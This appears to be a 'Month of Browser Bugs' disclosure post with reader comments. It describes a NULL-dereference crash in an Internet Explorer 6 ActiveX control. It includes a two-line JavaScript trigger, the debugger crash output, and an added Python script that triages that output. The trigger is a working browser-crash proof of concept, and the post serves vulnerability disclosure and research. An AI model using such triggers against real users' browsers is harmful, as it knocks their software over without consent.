MoBB #10: DXTFilter Enabled
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. By setting the 'Enabled' property of this control to a true value, we can trigger a NULL dereference.
var a = new ActiveXObject('Object.Microsoft.DXTFilter');
a.Enabled = 1;
Demonstration
eax=00000000 ebx=6bdd4728 ecx=00001008
edx=001bffff esi=02910488 edi=00000000
eip=6bde8881 esp=0013b250 ebp=0013b258
dxtrans!CDXTFilter::put_Enabled+0x75:
6bde8881 8b08 mov ecx,[eax] ds:0023:00000000=????????
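As an added example (not part of the original post), this Python sketch parses the debugger output above and does a first-pass triage of the fault: which module and function faulted, whether the access is a read or a write, and whether the address falls in the NULL page. The `triage` function, the 64 KB threshold and the verdict strings are assumptions made for illustration.

```python
import re

# Debugger output copied from the post above.
CRASH = """\
eax=00000000 ebx=6bdd4728 ecx=00001008
edx=001bffff esi=02910488 edi=00000000
eip=6bde8881 esp=0013b250 ebp=0013b258
dxtrans!CDXTFilter::put_Enabled+0x75:
6bde8881 8b08 mov ecx,[eax] ds:0023:00000000=????????
"""

# Assumption: addresses below 64 KB are unmapped in a default user-mode process.
NULL_PAGE_LIMIT = 0x10000

REG_RE = re.compile(r"\b(e[a-z]{2})=([0-9a-f]{8})\b")
SYM_RE = re.compile(r"^(\w+)!(\S+)\+0x([0-9a-f]+):\s*$", re.M)
INS_RE = re.compile(
    r"^([0-9a-f]{8})\s+[0-9a-f]+\s+(\w+)\s+(\S+)\s+"
    r"[a-z]s:[0-9a-f]{4}:([0-9a-f]{8})=(\S+)\s*$", re.M)


def triage(text):
    """First-pass classification of a 32-bit crash context (hypothetical helper)."""
    regs = {name: int(value, 16) for name, value in REG_RE.findall(text)}
    sym, ins = SYM_RE.search(text), INS_RE.search(text)
    if not (regs and sym and ins):
        raise ValueError("unrecognised crash format")
    ins_addr, mnemonic, operands = int(ins[1], 16), ins[2], ins[3]
    # The debugger prints '?' for memory it cannot read at the faulting address.
    address, unmapped = int(ins[4], 16), set(ins[5]) == {"?"}
    dest = operands.split(",")[0]
    # For mov, a bracketed destination operand means the fault is a write.
    access = "write" if mnemonic == "mov" and "[" in dest else "read"
    base = re.search(r"\[(e[a-z]{2})", operands)
    if regs.get("eip") != ins_addr:
        verdict = "eip is not at the listed instruction: analyse manually"
    elif unmapped and address < NULL_PAGE_LIMIT and access == "read":
        verdict = "near-NULL read: process crash, code execution unlikely"
    else:
        verdict = "not a plain NULL read: analyse manually"
    return {"module": sym[1], "function": sym[2], "offset": int(sym[3], 16),
            "access": access, "address": address,
            "base_reg": base[1] if base else None, "verdict": verdict}


if __name__ == "__main__":
    for key, value in triage(CRASH).items():
        print(f"{key}: {value}")
```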
This bug was reported to Microsoft in March of 2006.
This bug will be added to the OSVDB:
Microsoft IE Object.Microsoft.DXTFilter Enabled Property NULL Dereference
5 Comments:
You probably have different reasons for posting this great stuff on a daily basis, but could you address the bug ramifications from a security point of view? I.e., remote code execution, denial of service, steals your online viagra orders, etc.
The description of the bug usually describes the impact. Bugs that result in a NULL dereference are usually non-exploitable in terms of code execution.
Well until skape releases his research..............
This flaw is not dangerous because you have to click on the information bar in order to install/execute an ActiveX.
I get an "Automation server cannot create object" script error, but IE6 continues running. The buggy ActiveX control probably comes with some other piece of MS software, like Office 2K3 or something.
IE7 doesn't crash either.